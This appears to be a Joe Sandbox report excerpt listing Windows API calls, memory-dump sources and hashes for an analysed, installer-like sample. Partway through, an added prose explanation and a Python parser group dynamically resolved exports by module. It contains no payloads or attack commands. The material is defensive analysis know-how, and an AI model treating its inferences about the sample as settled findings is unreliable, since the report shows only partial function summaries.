                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$Delete$Stretch
                                                                                • String ID:
                                                                                • API String ID: 1458357782-0
                                                                                • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004233BF
                                                                                • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                • SetCursor.USER32(00000000), ref: 00423423
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID: LUm$x?m
                                                                                • API String ID: 730355536-1028250771
                                                                                • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                                                • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                • API String ID: 667068680-2254406584
                                                                                • Opcode ID: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                                • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                                                • Opcode Fuzzy Hash: 70207861a9ddbbfcf1ec4c2ebf1ed82301f215222d5c3051e71e037128298d5d
                                                                                • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
                                                                                • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                • API String ID: 190572456-212574377
                                                                                • Opcode ID: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                                • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                                                • Opcode Fuzzy Hash: 01040e06415ef817a4763b016626a28be3372e477bb5bd5db3809bf0997a53ea
                                                                                • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                                • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                                  • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                  • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                  • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                • API String ID: 142928637-2676053874
                                                                                • Opcode ID: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                                • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                                                • Opcode Fuzzy Hash: d06cc84e9d2e4e0b448c748badd712702b96776d6b0267aa2fd44745f5a2b4d6
                                                                                • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                                • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                • API String ID: 2238633743-1050967733
                                                                                • Opcode ID: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                                • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                                                • Opcode Fuzzy Hash: c58342e6ebd42d3e550f5fa79659fa064c9032f03f8e913941057cc824ddc2bd
                                                                                • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                • API String ID: 667068680-222143506
                                                                                • Opcode ID: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                                • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                                                • Opcode Fuzzy Hash: dff5fcaa570554af533fa68d6d4d47fa30ed3b2efb34bda6c6df081b9be12d17
                                                                                • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
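The function summaries above share one pattern: a module handle is obtained with GetModuleHandleA or LoadLibraryA and individual exports (MonitorFromRect, ChangeWindowMessageFilterEx, BZ2_bzDecompressInit, LresultFromObject, VerifyVersionInfoW, ...) are then resolved by name through GetProcAddress, so they never appear in the static import table. The following parser is an added example for triaging that pattern; it is not part of the Joe Sandbox report or of the sample. It reads the report's "• API.MODULE(args), ref: ADDR" lines, treats each "APIs" heading as the start of a new function, and collects which module each function loads and which names it resolves. The input below is copied from the listings above and is the only data it needs; the assumptions are that a group is delimited by an "APIs" line, that the first argument of GetModuleHandle/LoadLibrary and the second argument of GetProcAddress are the ones of interest, and that "?" or an 8-digit hex value in those positions is an unresolved placeholder rather than a name.

```python
import re
from collections import defaultdict

# Constructed input: lines copied from the function listings in this report.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
"""

# One API call line: "• Api.Module(arg,arg,...), ref: 0041B58E"
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>[A-Za-z0-9_]+)\.(?P<dll>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# Arguments the sandbox could not resolve to a string: "?" or a raw 8-digit hex value.
PLACEHOLDER_RE = re.compile(r"^(\?|[0-9A-Fa-f]{8})$")
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}


def parse_functions(text):
    """Split the listing into per-function groups (each begins with an 'APIs' line).

    Returns a list of dicts: module loaded by the function (lower-cased, or None
    when the handle came from elsewhere), the export names it resolves, and the
    call-site addresses of those GetProcAddress calls, in listing order.
    """
    groups = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"module": None, "resolved": [], "refs": []}
            groups.append(current)
            continue
        m = LINE_RE.match(line)
        if m is None or current is None:
            continue  # 'Part of subcall' lines, headings and other report text
        api = m.group("api")
        args = [a.strip() for a in m.group("args").split(",")]
        if api in LOADERS and args and not PLACEHOLDER_RE.match(args[0]):
            current["module"] = args[0].lower()
        elif api == "GetProcAddress" and len(args) >= 2 and not PLACEHOLDER_RE.match(args[1]):
            current["resolved"].append(args[1])
            current["refs"].append(m.group("ref"))
    return groups


def resolved_by_module(groups):
    """Aggregate the per-function results into module -> sorted list of resolved names.

    Functions whose module handle is not visible in their own listing are
    reported under '<unknown>' so they are not silently dropped.
    """
    table = defaultdict(set)
    for g in groups:
        if g["resolved"]:
            table[g["module"] or "<unknown>"].update(g["resolved"])
    return {mod: sorted(names) for mod, names in table.items()}


if __name__ == "__main__":
    for g in parse_functions(SAMPLE):
        print(g["module"] or "<unknown>", g["resolved"], g["refs"])
    print(resolved_by_module(parse_functions(SAMPLE)))
```

Run over a full report export, the module table is a quick way to see every export the binary resolves at run time that a static import scan would miss; the "<unknown>" bucket (here the BZ2_* decompression routines) marks functions whose module handle is passed in from a caller, so the loading function has to be found separately.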
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B58E
                                                                                • 73E9A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                • 73EA4620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                • 73ECE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                • 73ECE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                • 73E9A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E680$A4620A480A570Focus
                                                                                • String ID:
                                                                                • API String ID: 2226671993-0
                                                                                • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                APIs
                                                                                • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                • API String ID: 1452528299-1580325520
                                                                                • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                                                • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                • 73E9A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                • 73EA4620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                • 73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                • 73E9A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: A4620MetricsSystem$A480A570
                                                                                • String ID:
                                                                                • API String ID: 4120540252-0
                                                                                • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                                                • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
APIs
  • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
• UnrealizeObject.GDI32(00000000), ref: 0041B28C
• SelectObject.GDI32(?,00000000), ref: 0041B29E
• SetBkColor.GDI32(?,00000000), ref: 0041B2C1
• SetBkMode.GDI32(?,00000002), ref: 0041B2CC
• SetBkColor.GDI32(?,00000000), ref: 0041B2E7
• SetBkMode.GDI32(?,00000001), ref: 0041B2F2
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
APIs
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
  • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
  • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
Strings
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
Strings
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
• GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
• CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
Strings
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-3235461205
APIs
